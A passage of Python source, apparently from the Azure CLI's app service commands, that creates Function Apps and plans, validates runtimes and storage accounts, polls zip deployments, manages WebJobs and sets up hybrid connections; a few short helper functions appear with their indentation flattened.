            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
                                                       number_of_workers, min_val=0, max_val=20)
    if location is None:
        location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    client = web_client_factory(cmd.cli_ctx)
    sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
                              hyper_v=None, name=name)
    return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
    """Return True when plan_info is an AppServicePlan on the 'dynamic' (Consumption) tier."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if not isinstance(plan_info, AppServicePlan):
        return False
    if not isinstance(plan_info.sku, SkuDescription):
        return False
    return plan_info.sku.tier.lower() == 'dynamic'
def is_plan_elastic_premium(cmd, plan_info):
    """Return True when plan_info is an AppServicePlan on the Elastic Premium tier."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if not isinstance(plan_info, AppServicePlan):
        return False
    if not isinstance(plan_info.sku, SkuDescription):
        return False
    # Note: intentionally a case-sensitive comparison, mirroring the service's tier name.
    return plan_info.sku.tier == 'ElasticPremium'
def validate_and_convert_to_int(flag, val):
    """Convert *val* to int, raising a CLIError naming *flag* when it is not an integer."""
    try:
        return int(val)
    except ValueError as ex:
        # Fix: chain the original ValueError (B904) so tracebacks stay informative
        # instead of showing the confusing implicit "During handling..." context.
        raise CLIError("Usage error: {} is expected to have an int value.".format(flag)) from ex
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
    """Convert *value* to int and ensure it lies in [min_val, max_val], else raise CLIError."""
    value = validate_and_convert_to_int(flag_name, value)
    if not min_val <= value <= max_val:
        raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
                                                                                                max_val))
    return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
                    os_type=None, functions_version=None, runtime=None, runtime_version=None,
                    consumption_plan_location=None, app_insights=None, app_insights_key=None,
                    disable_app_insights=None, deployment_source_url=None,
                    deployment_source_branch='master', deployment_local_git=None,
                    docker_registry_server_password=None, docker_registry_server_user=None,
                    deployment_container_image_name=None, tags=None, assign_identities=None,
                    role='Contributor', scope=None):
    # pylint: disable=too-many-statements, too-many-branches
    """Create a Function App on either a Consumption plan or an existing App Service plan.

    Validates the runtime/runtime-version/functions-version combination against
    the bundled stacks JSON, wires storage/App Insights app settings, creates
    the site, then applies deployment-source, container, and identity options.
    Exactly one of --plan / --consumption-plan-location must be given.
    """
    if functions_version is None:
        logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
                       "be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
        functions_version = '2'
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    if bool(plan) == bool(consumption_plan_location):
        raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    disable_app_insights = (disable_app_insights == "true")
    site_config = SiteConfig(app_settings=[])
    functionapp_def = Site(location=None, site_config=site_config, tags=tags)
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    client = web_client_factory(cmd.cli_ctx)
    plan_info = None
    if runtime is not None:
        runtime = runtime.lower()
    if consumption_plan_location:
        locations = list_consumption_locations(cmd)
        location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
        # if os_type is None, the os type is windows
        is_linux = os_type and os_type.lower() == 'linux'
    else:  # apps with SKU based plan
        if is_valid_resource_id(plan):
            parse_result = parse_resource_id(plan)
            plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
        else:
            plan_info = client.app_service_plans.get(resource_group_name, plan)
        if not plan_info:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        location = plan_info.location
        is_linux = plan_info.reserved
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
        raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
                       "pass in the flag '--functions-version 3'")
    if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise CLIError(
            "usage error: --runtime RUNTIME required for linux functions apps without custom image.")
    runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
    if runtime is None and runtime_version is not None:
        raise CLIError('Must specify --runtime to use --runtime-version')
    # get the matching runtime stack object
    runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
    if not runtime_json:
        # no matching runtime for os
        os_string = "linux" if is_linux else "windows"
        supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
        raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
                       .format(os_string, ', '.join(supported_runtimes)))
    runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
                                                                          functions_version,
                                                                          runtime_version,
                                                                          is_linux)
    if not runtime_version_json:
        supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
                                              _get_supported_runtime_versions_functionapp(runtime_json,
                                                                                          functions_version)))
        if runtime_version:
            if runtime == 'dotnet':
                raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
                               'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
                               .format(runtime_version, functions_version))
            raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
                           '--functions-version {}. Supported versions are: {}.'
                           .format(runtime_version,
                                   runtime,
                                   functions_version,
                                   ', '.join(supported_runtime_versions)))
        # if runtime_version was not specified, then that runtime is not supported for that functions version
        raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
                       '--functions-version {}'
                       .format(runtime, functions_version))
    if runtime == 'dotnet':
        logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
                       '--functions-version. Dotnet version will be %s for this function app.',
                       runtime_version_json[KEYS.DISPLAY_VERSION])
    if runtime_version_json[KEYS.IS_DEPRECATED]:
        logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
                       'Please update your command to use a more recent version. For a list of supported '
                       '--runtime-versions, run \"az functionapp create -h\"',
                       runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
    site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
    app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
    con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
    if is_linux:
        functionapp_def.kind = 'functionapp,linux'
        functionapp_def.reserved = True
        is_consumption = consumption_plan_location is not None
        if not is_consumption:
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                functionapp_def.kind = 'functionapp,linux,container'
                site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
                                                              value=deployment_container_image_name))
                site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='false'))
                site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
                # clear all runtime specific configs and settings
                site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
                app_settings_json = {}
                # ensure that app insights is created if not disabled
                runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
            else:
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='true'))
    else:
        functionapp_def.kind = 'functionapp'
    # set site configs
    for prop, value in site_config_json.items():
        snake_case_prop = _convert_camel_to_snake_case(prop)
        setattr(site_config, snake_case_prop, value)
    # adding app settings
    for app_setting, value in app_settings_json.items():
        site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
    site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
                                                  value=_get_extension_version_functionapp(functions_version)))
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
    # If plan is not consumption or elastic premium, we need to set always on
    if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
        site_config.always_on = True
    # If plan is elastic premium or windows consumption, we need these app settings
    is_windows_consumption = consumption_plan_location is not None and not is_linux
    if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      value=con_string))
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
    create_app_insights = False
    if app_insights_key is not None:
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=app_insights_key))
    elif app_insights is not None:
        instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=instrumentation_key))
    elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        # set up dashboard if no app insights
        site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
    elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        create_app_insights = True
    poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
                       "created but is not active until content is published using "
                       "Azure Portal or the Functions Core Tools.", name)
    else:
        _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
                                 deployment_source_branch, deployment_local_git)
    if create_app_insights:
        try:
            try_create_application_insights(cmd, functionapp)
        except Exception:  # pylint: disable=broad-except
            # Best-effort: fall back to the storage-backed dashboard on failure.
            logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
                           'Please use the Azure Portal to create and configure the Application Insights, if needed.')
            update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                                ['AzureWebJobsDashboard={}'.format(con_string)])
    if deployment_container_image_name:
        update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
                                              deployment_container_image_name, docker_registry_server_user,
                                              docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        functionapp.identity = identity
    return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
    """Load the bundled functionapp runtime-stacks JSON for the requested OS."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    os_key = 'linux' if is_linux else 'windows'
    return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS[os_key])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
    """Return the first stack entry whose name equals *runtime*, or None when absent."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    return next((stack for stack in stacks_json if stack[KEYS.NAME] == runtime), None)
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
    """Return the runtime's major versions that support the given Functions extension version."""
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    return [version_json
            for version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]
            if extension_version in version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]]
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
    """Pick the runtime-version entry to use.

    With an explicit *runtime_version*, return the entry matching it (and the
    functions version), or None. Otherwise return the highest-versioned entry
    flagged as default, or {} when none qualifies.
    """
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    extension_version = _get_extension_version_functionapp(functions_version)
    if runtime_version:
        for candidate in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
            if (candidate[KEYS.DISPLAY_VERSION] == runtime_version and
                    extension_version in candidate[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
                return candidate
        return None
    # No explicit version: choose the newest default among the supported entries.
    best_json = {}
    best_version = 0.0
    for candidate in _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
        if not candidate[KEYS.IS_DEFAULT]:
            continue
        candidate_version = _get_runtime_version_functionapp(candidate[KEYS.RUNTIME_VERSION], is_linux)
        if not best_json or best_version < candidate_version:
            best_json = candidate
            best_version = candidate_version
    return best_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
    """Parse *version_string* into a float suitable for version comparison.

    Tries the Windows runtime pattern first, then the Linux one, then a
    plain float() conversion; unparseable input yields 0.
    NOTE: *is_linux* is accepted but unused — both patterns are always tried.
    """
    import re
    for pattern in (FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX):
        match = re.fullmatch(pattern, version_string)
        if match:
            return float(match.group(1))
    try:
        return float(version_string)
    except ValueError:
        return 0
def try_create_application_insights(cmd, functionapp):
    """Best-effort creation of an Application Insights component for
    *functionapp*, wiring its instrumentation key into the app settings.

    On failure, logs a warning and returns instead of raising.
    """
    creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
                           'Please use the Azure Portal to manually create and configure the Application Insights, ' \
                           'if needed.'
    insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
    component_body = {
        "name": functionapp.name,
        "location": functionapp.location,
        "kind": "web",
        "properties": {
            "Application_Type": "web"
        }
    }
    appinsights = insights_client.components.create_or_update(functionapp.resource_group,
                                                              functionapp.name, component_body)
    if appinsights is None or appinsights.instrumentation_key is None:
        logger.warning(creation_failed_warn)
        return
    # Reported via warning so it does not interfere with regular JSON output on stdout.
    logger.warning('Application Insights \"%s\" was created for this Function App. '
                   'You can visit https://portal.azure.com/#resource%s/overview to view your '
                   'Application Insights component', appinsights.name, appinsights.id)
    update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                        ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Attach a remote git source and/or local-git deployment to *webapp*.

    Remote linking failures are downgraded to warnings rather than raised;
    local-git setup records the repo URL on the webapp object.
    """
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            # translate to a friendlier error before logging
            ex = ex_handler_factory(no_throw=True)(ex)
            logger.warning("Link to git repository failed due to error '%s'", ex)
    if deployment_local_git:
        git_info = enable_local_git(cmd, resource_group_name, name)
        logger.warning("Local git is configured with url of '%s'", git_info['url'])
        webapp.deploymentLocalGitUrl = git_info['url']
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
    """Validate that *storage_account* (name or full resource ID) is usable
    for a function app and return its connection string.

    The account must expose blob, queue and table endpoints and use an
    allowed SKU.  Raises CLIError listing every failed check — previously
    only the last missing endpoint was reported because each message
    overwrote the previous one, and the SKU message was concatenated with
    no separator.
    """
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        parsed = parse_resource_id(storage_account)
        sa_resource_group = parsed['resource_group']
        storage_account = parsed['name']
    storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    errors = []
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name
    allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            errors.append("Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e))  # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        errors.append('Storage type {} is not allowed'.format(sku))
    if errors:
        raise CLIError(' '.join(errors))
    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure (key1/key2 directly)
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member
    endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
    connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https",
        endpoint_suffix,
        storage_account,
        keys[0])  # pylint: disable=no-member
    return connection_string
def list_consumption_locations(cmd):
    """Return regions that support the consumption (Dynamic) plan SKU.

    Names are normalized to lowercase with spaces removed.
    """
    geo_regions = web_client_factory(cmd.cli_ctx).list_geo_regions(sku='Dynamic')
    return [{'name': region.name.lower().replace(' ', '')} for region in geo_regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
    """Return geo regions that both support the requested SKU and are listed
    as locations for the Microsoft.Web/sites resource type.

    :param sku: short SKU name (e.g. 'S1'); expanded via get_sku_name.
    :param linux_workers_enabled: when set, restrict to regions with Linux workers.
    """
    web_client = web_client_factory(cmd.cli_ctx)
    full_sku = get_sku_name(sku)
    web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
    providers_client = providers_client_factory(cmd.cli_ctx)
    providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
    # Narrow the provider's resource types down to the location list of 'sites'.
    # NOTE(review): if no 'sites' entry exists, the variable still holds the
    # resource-type list and the membership test below would match nothing.
    for resource_type in providers_client_locations_list:
        if resource_type.resource_type == 'sites':
            providers_client_locations_list = resource_type.locations
            break
    return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
    """Poll the Kudu deployment-status endpoint until the zip deployment
    succeeds, fails, or the timeout elapses.

    Polls every 2 seconds; *timeout* (seconds) caps the wait, defaulting to
    450 trials (~15 minutes).  Raises CLIError on a failed (status 3) or
    timed-out deployment; returns the final status payload on success
    (status 4).
    """
    import requests
    from azure.cli.core.util import should_disable_connection_verify
    total_trials = (int(timeout) // 2) if timeout else 450
    num_trials = 0
    while num_trials < total_trials:
        time.sleep(2)
        response = requests.get(deployment_status_url, headers=authorization,
                                verify=not should_disable_connection_verify())
        try:
            res_dict = response.json()
        except json.decoder.JSONDecodeError:
            # Transient bad payloads from the endpoint are retried, not fatal.
            logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
            res_dict = {}
        finally:
            num_trials = num_trials + 1
        # status 3 == deployment failed
        if res_dict.get('status', 0) == 3:
            _configure_default_logging(cmd, rg_name, name)
            raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
                           "-n {} -g {}".format(res_dict, name, rg_name))
        # status 4 == deployment succeeded
        if res_dict.get('status', 0) == 4:
            break
        if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # show only in debug mode, customers seem to find this confusing
    # if the deployment is taking longer than expected
    if res_dict.get('status', 0) != 4:
        _configure_default_logging(cmd, rg_name, name)
        raise CLIError("""Timeout reached by the command, however, the deployment operation
                       is still on-going. Navigate to your scm site to check the deployment status""")
    return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
    """List the continuous WebJobs of a web app (or one of its slots)."""
    operation = 'list_continuous_web_jobs'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, operation, slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Start a continuous WebJob and return its refreshed description."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Stop a continuous WebJob and return its refreshed description."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a continuous WebJob from a web app (or one of its slots)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
    """List the triggered WebJobs of a web app (or one of its slots)."""
    operation = 'list_triggered_web_jobs'
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, operation, slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Run a triggered WebJob once and return its refreshed description."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
        return web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
    return web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered WebJob from a web app (or one of its slots)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    return web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
    """List the hybrid connections of a (Windows) web app or slot, pruned to
    the user-relevant fields.  Warns and returns None for Linux apps."""
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if webapp.reserved:  # 'reserved' flags a Linux plan
        return logger.warning("hybrid connections not supported on a linux app.")
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
    else:
        listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)

    def _prune(raw):
        # Keep only the user-relevant subset of the raw ARM payload.
        props = raw["properties"]
        return {
            "id": raw["id"],
            "location": raw["location"],
            "name": raw["name"],
            "properties": {
                "hostname": props["hostname"],
                "port": props["port"],
                "relayArmUri": props["relayArmUri"],
                "relayName": props["relayName"],
                "serviceBusNamespace": props["serviceBusNamespace"],
                "serviceBusSuffix": props["serviceBusSuffix"]
            },
            # resource group is the 5th segment of the ARM resource id
            "resourceGroup": raw["id"].split("/")[4],
            "type": raw["type"]
        }

    return [_prune(x) for x in listed_vals.additional_properties["value"]]
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
    """Attach an existing Relay hybrid connection to a (Windows) web app or slot.

    Looks up the Relay namespace, ensures a 'defaultSender' authorization
    rule exists (creating it with Send rights when missing), reads the
    endpoint host:port from the connection's user metadata, then creates the
    hybrid-connection binding on the app and returns a pruned summary dict.
    Warns and returns None for Linux apps, which do not support hybrid
    connections.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = linux_webapp.reserved
    if is_linux:
        return logger.warning("hybrid connections not supported on a linux app.")
    web_client = web_client_factory(cmd.cli_ctx)
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # find the ARM resource id of the requested Relay namespace
    hy_co_id = ''
    for n in namespace_client.list():
        if n.name == namespace:
            hy_co_id = n.id
    # extract the resource-group segment (the one following "resourceGroups")
    i = 0
    hy_co_resource_group = ''
    hy_co_split = hy_co_id.split("/")
    for z in hy_co_split:
        if z == "resourceGroups":
            hy_co_resource_group = hy_co_split[i + 1]
        i = i + 1
    # calling the relay API to get information about the hybrid connection
    hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)
    hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_info = hy_co.id
    # user_metadata holds a list of {"key": ..., "value": ...} pairs; the
    # 'endpoint' entry carries "hostname:port"
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    id_parameters = hy_co_info.split("/")
    # populate object with information from the hybrid connection, and set it
    # on webapp
    hc = HybridConnection(service_bus_namespace=id_parameters[8],
                          relay_name=hybrid_connection,
                          relay_arm_uri=hy_co_info,
                          hostname=hostname,
                          port=port,
                          send_key_name="defaultSender",
                          send_key_value=hy_co_keys.primary_key,
                          service_bus_suffix=".servicebus.windows.net")
    if slot is None:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
                                                                           hybrid_connection, hc)
    else:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
                                                                                hybrid_connection, hc, slot)
    # reformats hybrid connection, to prune unnecessary fields
    resourceGroup = return_hc.id.split("/")
    mod_hc = {
        "hostname": return_hc.hostname,
        "id": return_hc.id,
        "location": return_hc.additional_properties["location"],
        "name": return_hc.name,
        "port": return_hc.port,
        "relayArmUri": return_hc.relay_arm_uri,
        "resourceGroup": resourceGroup[4],
        "serviceBusNamespace": return_hc.service_bus_namespace,
        "serviceBusSuffix": return_hc.service_bus_suffix
    }
    return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
    """Point every app on *plan* that uses the hybrid connection at the
    primary or secondary key of the connection's 'defaultSender' rule.

    Ensures the 'defaultSender' authorization rule exists first (creating it
    with Send rights when missing).

    :param key_type: 'primary' or 'secondary' (case-insensitive); any other
        value logs a warning and returns without making changes.
    :return: the refreshed list of apps using this hybrid connection.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)
    # extract the hybrid connection resource group
    asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
                                                                   namespace, hybrid_connection)
    arm_uri = asp_hy_co.relay_arm_uri
    split_uri = arm_uri.split("resourceGroups/")
    resource_group_strings = split_uri[1].split('/')
    relay_resource_group = resource_group_strings[0]
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # calling the relay function to obtain information about the hc in question
    hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)
    hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
    # user_metadata holds a list of {"key": ..., "value": ...} pairs; the
    # 'endpoint' entry carries "hostname:port".
    # NOTE(review): hy_co_hostname starts as 0 — if no 'endpoint' entry
    # exists, the .split() below would raise AttributeError; confirm metadata
    # always contains one.
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = 0
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    key = "empty"
    if key_type.lower() == "primary":
        key = hy_co_keys.primary_key
    elif key_type.lower() == "secondary":
        key = hy_co_keys.secondary_key
    # ensures input is correct
    if key == "empty":
